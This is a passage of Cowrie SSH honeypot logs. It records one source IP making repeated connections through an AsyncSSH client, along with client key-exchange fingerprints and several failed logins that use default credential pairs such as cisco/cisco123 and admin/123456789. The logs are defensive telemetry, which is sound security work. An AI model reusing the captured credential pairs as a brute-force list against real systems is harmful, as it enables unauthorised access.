56,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:08:59.560632Z","src_ip":"212.227.235.229","session":"6975a01c79ea"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:09:00.480209Z","src_ip":"212.227.235.229","session":"a49ad3f1b22b"}
{"eventid":"cowrie.login.failed","username":"db2inst2","password":"db2inst2","message":"login attempt [db2inst2/db2inst2] failed","sensor":"my-vps","timestamp":"2025-08-28T08:09:02.693494Z","src_ip":"212.227.235.229","session":"6975a01c79ea"}
{"eventid":"cowrie.login.failed","username":"cisco","password":"cisco123","message":"login attempt [cisco/cisco123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:09:03.694504Z","src_ip":"212.227.235.229","session":"769097e18de1"}
{"eventid":"cowrie.session.closed","duration":"11.4","message":"Connection lost after 11.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:09:04.035065Z","src_ip":"212.227.235.229","session":"6975a01c79ea"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:09:04.960026Z","src_ip":"212.227.235.229","session":"769097e18de1"}
{"eventid":"cowrie.login.failed","username":"test","password":"teest","message":"login attempt [test/teest] failed","sensor":"my-vps","timestamp":"2025-08-28T08:09:05.153857Z","src_ip":"212.227.235.229","session":"4cdc6a85cee6"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:09:06.468762Z","src_ip":"212.227.235.229","session":"4cdc6a85cee6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39130,"dst_ip":"1.2.3.4","dst_port":22,"session":"82e9639cc9cc","protocol":"ssh","message":"New connection: 212.227.235.229:39130 (1.2.3.4:22) [session: 82e9639cc9cc]","sensor":"my-vps","timestamp":"2025-08-28T08:09:28.142039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:09:28.143458Z","src_ip":"212.227.235.229","session":"82e9639cc9cc"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:09:28.396350Z","src_ip":"212.227.235.229","session":"82e9639cc9cc"}
{"eventid":"cowrie.login.failed","username":"super","password":"super1234","message":"login attempt [super/super1234] failed","sensor":"my-vps","timestamp":"2025-08-28T08:09:29.604495Z","src_ip":"212.227.235.229","session":"82e9639cc9cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35280,"dst_ip":"1.2.3.4","dst_port":22,"session":"414f1ab17211","protocol":"ssh","message":"New connection: 212.227.235.229:35280 (1.2.3.4:22) [session: 414f1ab17211]","sensor":"my-vps","timestamp":"2025-08-28T08:09:29.967124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:09:29.968504Z","src_ip":"212.227.235.229","session":"414f1ab17211"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:09:30.950195Z","src_ip":"212.227.235.229","session":"82e9639cc9cc"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:09:31.516693Z","src_ip":"212.227.235.229","session":"414f1ab17211"}
{"eventid":"cowrie.login.failed","username":"secret","password":"secret","message":"login attempt [secret/secret] failed","sensor":"my-vps","timestamp":"2025-08-28T08:09:32.836621Z","src_ip":"212.227.235.229","session":"414f1ab17211"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:09:34.690964Z","src_ip":"212.227.235.229","session":"414f1ab17211"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33726,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f31c51b9e10","protocol":"ssh","message":"New connection: 212.227.235.229:33726 (1.2.3.4:22) [session: 4f31c51b9e10]","sensor":"my-vps","timestamp":"2025-08-28T08:09:40.625992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:09:40.790694Z","src_ip":"212.227.235.229","session":"4f31c51b9e10"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:09:40.942966Z","src_ip":"212.227.235.229","session":"4f31c51b9e10"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0987654321","message":"login attempt [admin/0987654321] failed","sensor":"my-vps","timestamp":"2025-08-28T08:09:42.172486Z","src_ip":"212.227.235.229","session":"4f31c51b9e10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33838,"dst_ip":"1.2.3.4","dst_port":22,"session":"444b749004d0","protocol":"ssh","message":"New connection: 212.227.235.229:33838 (1.2.3.4:22) [session: 444b749004d0]","sensor":"my-vps","timestamp":"2025-08-28T08:09:42.718391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:09:42.889159Z","src_ip":"212.227.235.229","session":"444b749004d0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:09:43.139702Z","src_ip":"212.227.235.229","session":"444b749004d0"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:09:43.810074Z","src_ip":"212.227.235.229","session":"4f31c51b9e10"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T08:09:45.708973Z","src_ip":"212.227.235.229","session":"444b749004d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33844,"dst_ip":"1.2.3.4","dst_port":22,"session":"a83baba346ae","protocol":"ssh","message":"New connection: 212.227.235.229:33844 (1.2.3.4:22) [session: a83baba346ae]","sensor":"my-vps","timestamp":"2025-08-28T08:09:46.229523Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:09:46.230942Z","src_ip":"212.227.235.229","session":"a83baba346ae"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:09:46.493324Z","src_ip":"212.227.235.229","session":"a83baba346ae"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:09:46.970481Z","src_ip":"212.227.235.229","session":"444b749004d0"}
{"eventid":"cowrie.login.failed","username":"ace","password":"ace","message":"login attempt [ace/ace] failed","sensor":"my-vps","timestamp":"2025-08-28T08:09:47.569999Z","src_ip":"212.227.235.229","session":"a83baba346ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33848,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff50c9a5b8fe","protocol":"ssh","message":"New connection: 212.227.235.229:33848 (1.2.3.4:22) [session: ff50c9a5b8fe]","sensor":"my-vps","timestamp":"2025-08-28T08:09:47.583493Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:09:47.665796Z","src_ip":"212.227.235.229","session":"ff50c9a5b8fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33850,"dst_ip":"1.2.3.4","dst_port":22,"session":"e27789cfb175","protocol":"ssh","message":"New connection: 212.227.235.229:33850 (1.2.3.4:22) [session: e27789cfb175]","sensor":"my-vps","timestamp":"2025-08-28T08:09:47.666935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:09:47.848025Z","src_ip":"212.227.235.229","session":"e27789cfb175"}
